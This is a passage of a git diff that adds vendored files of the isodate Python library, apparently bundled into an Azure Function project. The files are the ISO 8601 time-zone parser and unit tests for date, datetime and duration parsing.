b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py new file mode 100644 index 0000000..f2e86ed --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py @@ -0,0 +1,112 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module provides an ISO 8601:2004 time zone info parser. + +It offers a function to parse the time zone offset as specified by ISO 8601. +''' +import re + +from isodate.isoerror import ISO8601Error +from isodate.tzinfo import UTC, FixedOffset, ZERO + +TZ_REGEX = r"(?P(Z|(?P[+-])"\ + r"(?P[0-9]{2})(:?(?P[0-9]{2}))?)?)" + +TZ_RE = re.compile(TZ_REGEX) + + +def build_tzinfo(tzname, tzsign='+', tzhour=0, tzmin=0): + ''' + create a tzinfo instance according to given parameters. + + tzname: + 'Z' ... return UTC + '' | None ... return None + other ... return FixedOffset + ''' + if tzname is None or tzname == '': + return None + if tzname == 'Z': + return UTC + tzsign = ((tzsign == '-') and -1) or 1 + return FixedOffset(tzsign * tzhour, tzsign * tzmin, tzname) + + +def parse_tzinfo(tzstring): + ''' + Parses ISO 8601 time zone designators to tzinfo objecs. + + A time zone designator can be in the following format: + no designator indicates local time zone + Z UTC + +-hhmm basic hours and minutes + +-hh:mm extended hours and minutes + +-hh hours + ''' + match = TZ_RE.match(tzstring) + if match: + groups = match.groupdict() + return build_tzinfo(groups['tzname'], groups['tzsign'], + int(groups['tzhour'] or 0), + int(groups['tzmin'] or 0)) + raise ISO8601Error('%s not a valid time zone info' % tzstring) + + +def tz_isoformat(dt, format='%Z'): + ''' + return time zone offset ISO 8601 formatted. + The various ISO formats can be chosen with the format parameter. + + if tzinfo is None returns '' + if tzinfo is UTC returns 'Z' + else the offset is rendered to the given format. + format: + %h ... +-HH + %z ... +-HHMM + %Z ... +-HH:MM + ''' + tzinfo = dt.tzinfo + if (tzinfo is None) or (tzinfo.utcoffset(dt) is None): + return '' + if tzinfo.utcoffset(dt) == ZERO and tzinfo.dst(dt) == ZERO: + return 'Z' + tdelta = tzinfo.utcoffset(dt) + seconds = tdelta.days * 24 * 60 * 60 + tdelta.seconds + sign = ((seconds < 0) and '-') or '+' + seconds = abs(seconds) + minutes, seconds = divmod(seconds, 60) + hours, minutes = divmod(minutes, 60) + if hours > 99: + raise OverflowError('can not handle differences > 99 hours') + if format == '%Z': + return '%s%02d:%02d' % (sign, hours, minutes) + elif format == '%z': + return '%s%02d%02d' % (sign, hours, minutes) + elif format == '%h': + return '%s%02d' % (sign, hours) + raise ValueError('unknown format string "%s"' % format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py new file mode 100644 index 0000000..6099e6c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py @@ -0,0 +1,51 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Collect all test suites into one TestSuite instance. +''' + +import unittest +from isodate.tests import (test_date, test_time, test_datetime, test_duration, + test_strf, test_pickle) + + +def test_suite(): + ''' + Return a new TestSuite instance consisting of all available TestSuites. + ''' + return unittest.TestSuite([ + test_date.test_suite(), + test_time.test_suite(), + test_datetime.test_suite(), + test_duration.test_suite(), + test_strf.test_suite(), + test_pickle.test_suite(), + ]) + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3b5dd2e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc new file mode 100644 index 0000000..4db0e02 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc new file mode 100644 index 0000000..4359924 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc new file mode 100644 index 0000000..582fa82 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc new file mode 100644 index 0000000..d24ff58 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc new file mode 100644 index 0000000..78b2c92 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc new file mode 100644 index 0000000..daf3c61 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py new file mode 100644 index 0000000..753faf3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py @@ -0,0 +1,132 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodate module. +''' +import unittest +from datetime import date +from isodate import parse_date, ISO8601Error, date_isoformat +from isodate import DATE_CENTURY, DATE_YEAR +from isodate import DATE_BAS_MONTH, DATE_EXT_MONTH +from isodate import DATE_EXT_COMPLETE, DATE_BAS_COMPLETE +from isodate import DATE_BAS_ORD_COMPLETE, DATE_EXT_ORD_COMPLETE +from isodate import DATE_BAS_WEEK, DATE_BAS_WEEK_COMPLETE +from isodate import DATE_EXT_WEEK, DATE_EXT_WEEK_COMPLETE + +# the following list contains tuples of ISO date strings and the expected +# result from the parse_date method. A result of None means an ISO8601Error +# is expected. The test cases are grouped into dates with 4 digit years +# and 6 digit years. +TEST_CASES = {4: [('19', date(1901, 1, 1), DATE_CENTURY), + ('1985', date(1985, 1, 1), DATE_YEAR), + ('1985-04', date(1985, 4, 1), DATE_EXT_MONTH), + ('198504', date(1985, 4, 1), DATE_BAS_MONTH), + ('1985-04-12', date(1985, 4, 12), DATE_EXT_COMPLETE), + ('19850412', date(1985, 4, 12), DATE_BAS_COMPLETE), + ('1985102', date(1985, 4, 12), DATE_BAS_ORD_COMPLETE), + ('1985-102', date(1985, 4, 12), DATE_EXT_ORD_COMPLETE), + ('1985W155', date(1985, 4, 12), DATE_BAS_WEEK_COMPLETE), + ('1985-W15-5', date(1985, 4, 12), DATE_EXT_WEEK_COMPLETE), + ('1985W15', date(1985, 4, 8), DATE_BAS_WEEK), + ('1985-W15', date(1985, 4, 8), DATE_EXT_WEEK), + ('1989-W15', date(1989, 4, 10), DATE_EXT_WEEK), + ('1989-W15-5', date(1989, 4, 14), DATE_EXT_WEEK_COMPLETE), + ('1-W1-1', None, DATE_BAS_WEEK_COMPLETE)], + 6: [('+0019', date(1901, 1, 1), DATE_CENTURY), + ('+001985', date(1985, 1, 1), DATE_YEAR), + ('+001985-04', date(1985, 4, 1), DATE_EXT_MONTH), + ('+001985-04-12', date(1985, 4, 12), DATE_EXT_COMPLETE), + ('+0019850412', date(1985, 4, 12), DATE_BAS_COMPLETE), + ('+001985102', date(1985, 4, 12), DATE_BAS_ORD_COMPLETE), + ('+001985-102', date(1985, 4, 12), DATE_EXT_ORD_COMPLETE), + ('+001985W155', date(1985, 4, 12), DATE_BAS_WEEK_COMPLETE), + ('+001985-W15-5', date(1985, 4, 12), DATE_EXT_WEEK_COMPLETE), + ('+001985W15', date(1985, 4, 8), DATE_BAS_WEEK), + ('+001985-W15', date(1985, 4, 8), DATE_EXT_WEEK)]} + + +def create_testcase(yeardigits, datestring, expectation, format): + ''' + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + ''' + + class TestDate(unittest.TestCase): + ''' + A test case template to parse an ISO date string into a date + object. + ''' + + def test_parse(self): + ''' + Parse an ISO date string and compare it to the expected value. + ''' + if expectation is None: + self.assertRaises(ISO8601Error, parse_date, datestring, + yeardigits) + else: + result = parse_date(datestring, yeardigits) + self.assertEqual(result, expectation) + + def test_format(self): + ''' + Take date object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + date_isoformat, expectation, format, + yeardigits) + else: + self.assertEqual(date_isoformat(expectation, format, + yeardigits), + datestring) + + return unittest.TestLoader().loadTestsFromTestCase(TestDate) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + for yeardigits, tests in TEST_CASES.items(): + for datestring, expectation, format in tests: + suite.addTest(create_testcase(yeardigits, datestring, + expectation, format)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py new file mode 100644 index 0000000..ea768e2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py @@ -0,0 +1,157 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodatetime module. +''' +import unittest +from datetime import datetime + +from isodate import parse_datetime, UTC, FixedOffset, datetime_isoformat +from isodate import ISO8601Error +from isodate import DATE_BAS_COMPLETE, TIME_BAS_MINUTE, TIME_BAS_COMPLETE +from isodate import DATE_EXT_COMPLETE, TIME_EXT_MINUTE, TIME_EXT_COMPLETE +from isodate import TZ_BAS, TZ_EXT, TZ_HOUR +from isodate import DATE_BAS_ORD_COMPLETE, DATE_EXT_ORD_COMPLETE +from isodate import DATE_BAS_WEEK_COMPLETE, DATE_EXT_WEEK_COMPLETE + +# the following list contains tuples of ISO datetime strings and the expected +# result from the parse_datetime method. A result of None means an ISO8601Error +# is expected. +TEST_CASES = [('19850412T1015', datetime(1985, 4, 12, 10, 15), + DATE_BAS_COMPLETE + 'T' + TIME_BAS_MINUTE, + '19850412T1015'), + ('1985-04-12T10:15', datetime(1985, 4, 12, 10, 15), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_MINUTE, + '1985-04-12T10:15'), + ('1985102T1015Z', datetime(1985, 4, 12, 10, 15, tzinfo=UTC), + DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_MINUTE + TZ_BAS, + '1985102T1015Z'), + ('1985-102T10:15Z', datetime(1985, 4, 12, 10, 15, tzinfo=UTC), + DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_EXT, + '1985-102T10:15Z'), + ('1985W155T1015+0400', datetime(1985, 4, 12, 10, 15, + tzinfo=FixedOffset(4, 0, + '+0400')), + DATE_BAS_WEEK_COMPLETE + 'T' + TIME_BAS_MINUTE + TZ_BAS, + '1985W155T1015+0400'), + ('1985-W15-5T10:15+04', datetime(1985, 4, 12, 10, 15, + tzinfo=FixedOffset(4, 0, + '+0400'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_HOUR, + '1985-W15-5T10:15+04'), + ('1985-W15-5T10:15-0430', + datetime(1985, 4, 12, 10, 15, tzinfo=FixedOffset(-4, -30, + '-0430'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_BAS, + '1985-W15-5T10:15-0430'), + ('1985-W15-5T10:15+04:45', + datetime(1985, 4, 12, 10, 15, tzinfo=FixedOffset(4, 45, + '+04:45'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_EXT, + '1985-W15-5T10:15+04:45'), + ('20110410T101225.123000Z', + datetime(2011, 4, 10, 10, 12, 25, 123000, tzinfo=UTC), + DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE + ".%f" + TZ_BAS, + '20110410T101225.123000Z'), + ('2012-10-12T08:29:46.069178Z', + datetime(2012, 10, 12, 8, 29, 46, 69178, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-12T08:29:46.069178Z'), + ('2012-10-12T08:29:46.691780Z', + datetime(2012, 10, 12, 8, 29, 46, 691780, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-12T08:29:46.691780Z'), + ('2012-10-30T08:55:22.1234567Z', + datetime(2012, 10, 30, 8, 55, 22, 123457, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-30T08:55:22.123457Z'), + ('2012-10-30T08:55:22.1234561Z', + datetime(2012, 10, 30, 8, 55, 22, 123456, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-30T08:55:22.123456Z'), + ('2014-08-18 14:55:22.123456Z', None, + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2014-08-18T14:55:22.123456Z'), + ] + + +def create_testcase(datetimestring, expectation, format, output): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDateTime(unittest.TestCase): + ''' + A test case template to parse an ISO datetime string into a + datetime object. + ''' + + def test_parse(self): + ''' + Parse an ISO datetime string and compare it to the expected value. + ''' + if expectation is None: + self.assertRaises(ISO8601Error, parse_datetime, datetimestring) + else: + self.assertEqual(parse_datetime(datetimestring), expectation) + + def test_format(self): + ''' + Take datetime object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + datetime_isoformat, expectation, format) + else: + self.assertEqual(datetime_isoformat(expectation, format), + output) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateTime) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + for datetimestring, expectation, format, output in TEST_CASES: + suite.addTest(create_testcase(datetimestring, expectation, + format, output)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py new file mode 100644 index 0000000..39f1c90 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py @@ -0,0 +1,606 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isoduration module. +''' +import unittest +import operator +from datetime import timedelta, date, datetime + +from isodate import Duration, parse_duration, ISO8601Error +from isodate import D_DEFAULT, D_WEEK, D_ALT_EXT, duration_isoformat + +# the following list contains tuples of ISO duration strings and the expected +# result from the parse_duration method. A result of None means an ISO8601Error +# is expected. +PARSE_TEST_CASES = {'P18Y9M4DT11H9M8S': (Duration(4, 8, 0, 0, 9, 11, 0, 9, 18), + D_DEFAULT, None), + 'P2W': (timedelta(weeks=2), D_WEEK, None), + 'P3Y6M4DT12H30M5S': (Duration(4, 5, 0, 0, 30, 12, 0, 6, 3), + D_DEFAULT, None), + 'P23DT23H': (timedelta(hours=23, days=23), + D_DEFAULT, None), + 'P4Y': (Duration(years=4), D_DEFAULT, None), + 'P1M': (Duration(months=1), D_DEFAULT, None), + 'PT1M': (timedelta(minutes=1), D_DEFAULT, None), + 'P0.5Y': (Duration(years=0.5), D_DEFAULT, None), + 'PT36H': (timedelta(hours=36), D_DEFAULT, 'P1DT12H'), + 'P1DT12H': (timedelta(days=1, hours=12), D_DEFAULT, None), + '+P11D': (timedelta(days=11), D_DEFAULT, 'P11D'), + '-P2W': (timedelta(weeks=-2), D_WEEK, None), + '-P2.2W': (timedelta(weeks=-2.2), D_DEFAULT, + '-P15DT9H36M'), + 'P1DT2H3M4S': (timedelta(days=1, hours=2, minutes=3, + seconds=4), D_DEFAULT, None), + 'P1DT2H3M': (timedelta(days=1, hours=2, minutes=3), + D_DEFAULT, None), + 'P1DT2H': (timedelta(days=1, hours=2), D_DEFAULT, None), + 'PT2H': (timedelta(hours=2), D_DEFAULT, None), + 'PT2.3H': (timedelta(hours=2.3), D_DEFAULT, 'PT2H18M'), + 'PT2H3M4S': (timedelta(hours=2, minutes=3, seconds=4), + D_DEFAULT, None), + 'PT3M4S': (timedelta(minutes=3, seconds=4), D_DEFAULT, + None), + 'PT22S': (timedelta(seconds=22), D_DEFAULT, None), + 'PT22.22S': (timedelta(seconds=22.22), 'PT%S.%fS', + 'PT22.220000S'), + '-P2Y': (Duration(years=-2), D_DEFAULT, None), + '-P3Y6M4DT12H30M5S': (Duration(-4, -5, 0, 0, -30, -12, 0, + -6, -3), D_DEFAULT, None), + '-P1DT2H3M4S': (timedelta(days=-1, hours=-2, minutes=-3, + seconds=-4), D_DEFAULT, None), + # alternative format + 'P0018-09-04T11:09:08': (Duration(4, 8, 0, 0, 9, 11, 0, 9, + 18), D_ALT_EXT, None), + # 'PT000022.22': timedelta(seconds=22.22), + } + +# d1 d2 '+', '-', '>' +# A list of test cases to test addition and subtraction between datetime and +# Duration objects. +# each tuple contains 2 duration strings, and a result string for addition and +# one for subtraction. The last value says, if the first duration is greater +# than the second. +MATH_TEST_CASES = (('P5Y7M1DT9H45M16.72S', 'PT27M24.68S', + 'P5Y7M1DT10H12M41.4S', 'P5Y7M1DT9H17M52.04S', None), + ('PT28M12.73S', 'PT56M29.92S', + 'PT1H24M42.65S', '-PT28M17.19S', False), + ('P3Y7M23DT5H25M0.33S', 'PT1H1.95S', + 'P3Y7M23DT6H25M2.28S', 'P3Y7M23DT4H24M58.38S', None), + ('PT1H1.95S', 'P3Y7M23DT5H25M0.33S', + 'P3Y7M23DT6H25M2.28S', '-P3Y7M23DT4H24M58.38S', None), + ('P1332DT55M0.33S', 'PT1H1.95S', + 'P1332DT1H55M2.28S', 'P1331DT23H54M58.38S', True), + ('PT1H1.95S', 'P1332DT55M0.33S', + 'P1332DT1H55M2.28S', '-P1331DT23H54M58.38S', False)) + + +# A list of test cases to test addition and subtraction of date/datetime +# and Duration objects. They are tested against the results of an +# equal long timedelta duration. +DATE_TEST_CASES = ((date(2008, 2, 29), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (date(2008, 1, 31), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 2, 29), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 1, 31), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 4, 21), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 5, 5), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2000, 1, 1), + timedelta(hours=-33), + Duration(hours=-33)), + (datetime(2008, 5, 5), + Duration(years=1, months=1, days=10, hours=12, + minutes=20), + Duration(months=13, days=10, hours=12, minutes=20)), + (datetime(2000, 3, 30), + Duration(years=1, months=1, days=10, hours=12, + minutes=20), + Duration(months=13, days=10, hours=12, minutes=20)), + ) + +# A list of test cases of additon of date/datetime and Duration. The results +# are compared against a given expected result. +DATE_CALC_TEST_CASES = ( + (date(2000, 2, 1), + Duration(years=1, months=1), + date(2001, 3, 1)), + (date(2000, 2, 29), + Duration(years=1, months=1), + date(2001, 3, 29)), + (date(2000, 2, 29), + Duration(years=1), + date(2001, 2, 28)), + (date(1996, 2, 29), + Duration(years=4), + date(2000, 2, 29)), + (date(2096, 2, 29), + Duration(years=4), + date(2100, 2, 28)), + (date(2000, 2, 1), + Duration(years=-1, months=-1), + date(1999, 1, 1)), + (date(2000, 2, 29), + Duration(years=-1, months=-1), + date(1999, 1, 29)), + (date(2000, 2, 1), + Duration(years=1, months=1, days=1), + date(2001, 3, 2)), + (date(2000, 2, 29), + Duration(years=1, months=1, days=1), + date(2001, 3, 30)), + (date(2000, 2, 29), + Duration(years=1, days=1), + date(2001, 3, 1)), + (date(1996, 2, 29), + Duration(years=4, days=1), + date(2000, 3, 1)), + (date(2096, 2, 29), + Duration(years=4, days=1), + date(2100, 3, 1)), + (date(2000, 2, 1), + Duration(years=-1, months=-1, days=-1), + date(1998, 12, 31)), + (date(2000, 2, 29), + Duration(years=-1, months=-1, days=-1), + date(1999, 1, 28)), + (date(2001, 4, 1), + Duration(years=-1, months=-1, days=-1), + date(2000, 2, 29)), + (date(2000, 4, 1), + Duration(years=-1, months=-1, days=-1), + date(1999, 2, 28)), + (Duration(years=1, months=2), + Duration(years=0, months=0, days=1), + Duration(years=1, months=2, days=1)), + (Duration(years=-1, months=-1, days=-1), + date(2000, 4, 1), + date(1999, 2, 28)), + (Duration(years=1, months=1, weeks=5), + date(2000, 1, 30), + date(2001, 4, 4)), + (parse_duration("P1Y1M5W"), + date(2000, 1, 30), + date(2001, 4, 4)), + (parse_duration("P0.5Y"), + date(2000, 1, 30), + None), + (Duration(years=1, months=1, hours=3), + datetime(2000, 1, 30, 12, 15, 00), + datetime(2001, 2, 28, 15, 15, 00)), + (parse_duration("P1Y1MT3H"), + datetime(2000, 1, 30, 12, 15, 00), + datetime(2001, 2, 28, 15, 15, 00)), + 